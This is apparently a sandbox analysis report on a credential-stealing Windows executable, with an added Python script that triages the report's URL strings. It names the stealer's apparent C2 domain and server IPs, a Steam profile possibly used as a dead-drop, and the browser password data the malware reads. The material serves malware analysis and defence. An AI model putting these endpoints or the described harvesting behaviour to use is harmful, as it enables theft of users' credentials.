              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
              Source: k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261475852.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2260828830.0000000005585000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/$$
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
              Source: k7T6akLcAr.exe, 00000000.00000003.2283743192.000000000558A000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2283837927.0000000005596000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2284043332.0000000005592000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api3
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api9
              Source: k7T6akLcAr.exe, 00000000.00000003.2388617851.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000002.2392347427.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api?
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiFV
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
              Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi;
              Source: k7T6akLcAr.exe, 00000000.00000003.2354242281.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apingNot_NullproductState
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237220194.00000000055CF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: k7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
              Source: k7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: k7T6akLcAr.exe, 00000000.00000003.2285086260.000000000569F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: k7T6akLcAr.exe, 00000000.00000003.2307744830.0000000005592000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2308093192.0000000005596000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49752 version: TLS 1.2
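The URL strings and TLS sessions listed above mix two very different things: the host the stealer reports to (lev-tolstoi.com, which appears in a dozen ragged variants and in seven memory regions) and the hundreds of URLs it read while harvesting browser profiles and cached pages (search-engine suggestion endpoints, Steam CDN assets, Mozilla pages). The script below, an added example that is not part of the Joe Sandbox report or of Joe Sandbox, groups string hits by host, allow-lists hosts that are expected in harvested browser data, recognises a truncated allow-listed host (the report's "https://www.mozilla.or"), folds the scanner-overrun variants "/api3", "/apiFV", "/pi;" back to a base path, and counts TLS sessions per server IP. ALLOWLIST, the path-folding rule and the function names are assumptions made here; REPORT_LINES are copies of lines from the report above with the Source column shortened.

```python
"""Sort the report's URL strings into C2 candidates and browser-profile noise.

Added example, not part of the Joe Sandbox report.  Most "String found in
binary or memory" URLs in a stealer's dumps are data it read rather than hosts
it talks to.  ALLOWLIST and the path-folding rule are assumptions made here;
REPORT_LINES are lines copied from the report with the Source column shortened.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

ALLOWLIST = {  # assumption: hosts expected inside harvested browser data for this case
    "duckduckgo.com", "www.google.com", "www.ecosia.org", "ch.search.yahoo.com",
    "community.fastly.steamstatic.com", "steamcommunity.com", "store.steampowered.com",
    "help.steampowered.com", "www.valvesoftware.com", "www.mozilla.org",
    "support.mozilla.org", "contile-images.services.mozilla.com", "www.amazon.com",
    "www.t-mobile.com", "imp.mt48.net",
}
STRING_RE = re.compile(r"String found in binary or memory:\s*(https?://\S+)")
TLS_RE = re.compile(r"HTTPS traffic detected: (\d+(?:\.\d+){3}):\d+ -> "
                    r"\d+(?:\.\d+){3}:(\d+) version: (.+?)\s*$")


def fold_path(path: str) -> str:
    """Keep the leading run of lowercase letters: '/api3', '/apiFV', '/api?' fold
    to '/api'; '/$$' folds to '/'.  '/apingNot_Null...' stays '/aping' for a human
    to judge, since guessing where that string ended would invent an endpoint."""
    return re.match(r"/[a-z]*", path or "/").group(0)


def classify(host: str) -> str:
    if host in ALLOWLIST:
        return "expected"
    if host and any(a.startswith(host) for a in ALLOWLIST):
        return "truncated-expected"      # a cut-off string such as "www.mozilla.or"
    return "candidate"


def triage_strings(lines):
    """Per host: string hits, memory regions (.sdmp entries in the Source column)
    that contained them, folded paths with counts, and the class."""
    hosts = defaultdict(lambda: {"hits": 0, "regions": 0, "paths": Counter()})
    for line in lines:
        m = STRING_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))       # hostname drops the ':443' port suffix
        h = hosts[parts.hostname or ""]
        h["hits"] += 1
        h["regions"] += line.split("String found", 1)[0].count(".sdmp")
        h["paths"][fold_path(parts.path)] += 1
    for host, h in hosts.items():
        h["class"] = classify(host)
    return dict(hosts)


def candidate_hosts(lines):
    return sorted(h for h, v in triage_strings(lines).items() if v["class"] == "candidate")


def tls_sessions(lines):
    """Sessions per (server IP, TLS version); the report prints one line per client port."""
    out = Counter()
    for line in lines:
        m = TLS_RE.search(line)
        if m:
            out[(m.group(1), m.group(3))] += 1
    return out


REPORT_LINES = [  # copied from the report above, Source column shortened
    "Source: k7T6akLcAr.exe, 00000000.00000003.2237358352.00000000055CC000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237434433.00000000055CC000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2214037124.0000000000A9F000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges",
    "Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A84000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261475852.000000000558A000.sdmp | String found in binary or memory: https://lev-tolstoi.com/",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A0D000.sdmp | String found in binary or memory: https://lev-tolstoi.com/$$",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2214068044.0000000000A4D000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2355357038.0000000000A9C000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2283743192.000000000558A000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api3",
    "Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A4D000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiFV",
    "Source: k7T6akLcAr.exe, 00000000.00000002.2392016339.0000000000A89000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi;",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2354242281.0000000000AAB000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apingNot_NullproductState",
    "Source: k7T6akLcAr.exe, 00000000.00000003.2307679456.00000000055A9000.sdmp | String found in binary or memory: https://www.mozilla.or",
    "Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49711 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49712 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49718 version: TLS 1.2",
]
```

Running `candidate_hosts(REPORT_LINES)` on the embedded lines leaves only lev-tolstoi.com, with "/api" as the folded path that recurs across dumps. Two caveats when applying this to the full list. First, allow-listing steamcommunity.com hides the profile URL with the numeric ID 76561199724331900 that sits next to the C2 strings; public reporting on this family describes Steam profile pages being used as dead-drop resolvers, so that URL deserves a manual look even though the report itself does not establish that role here. Second, 172.67.157.254 lies in address space used by Cloudflare's reverse proxy, so the server name, not the IP, is the durable indicator; the single session to 23.55.153.106 is the one to check separately rather than fold into the C2 count.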

              System Summary

              Source: k7T6akLcAr.exe | Static PE information: section name: (empty)
              Source: k7T6akLcAr.exe | Static PE information: section name: .rsrc
              Source: k7T6akLcAr.exe | Static PE information: section name: .idata
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_0559DA03
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_0559D1DB
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Code function: 0_3_055995D3
              Source: k7T6akLcAr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: k7T6akLcAr.exe | Static PE information: Section: ZLIB complexity 0.9995532066993464
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: k7T6akLcAr.exe, 00000000.00000003.2237873940.000000000559E000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2261256267.00000000055B4000.00000004.00000800.00020000.00000000.sdmp, k7T6akLcAr.exe, 00000000.00000003.2237567819.00000000055BA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: k7T6akLcAr.exe | ReversingLabs: Detection: 55%
              Source: k7T6akLcAr.exe | Virustotal: Detection: 56%
              Source: k7T6akLcAr.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | File read: C:\Users\user\Desktop\k7T6akLcAr.exe
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\k7T6akLcAr.exe | Section loaded: schannel.dll
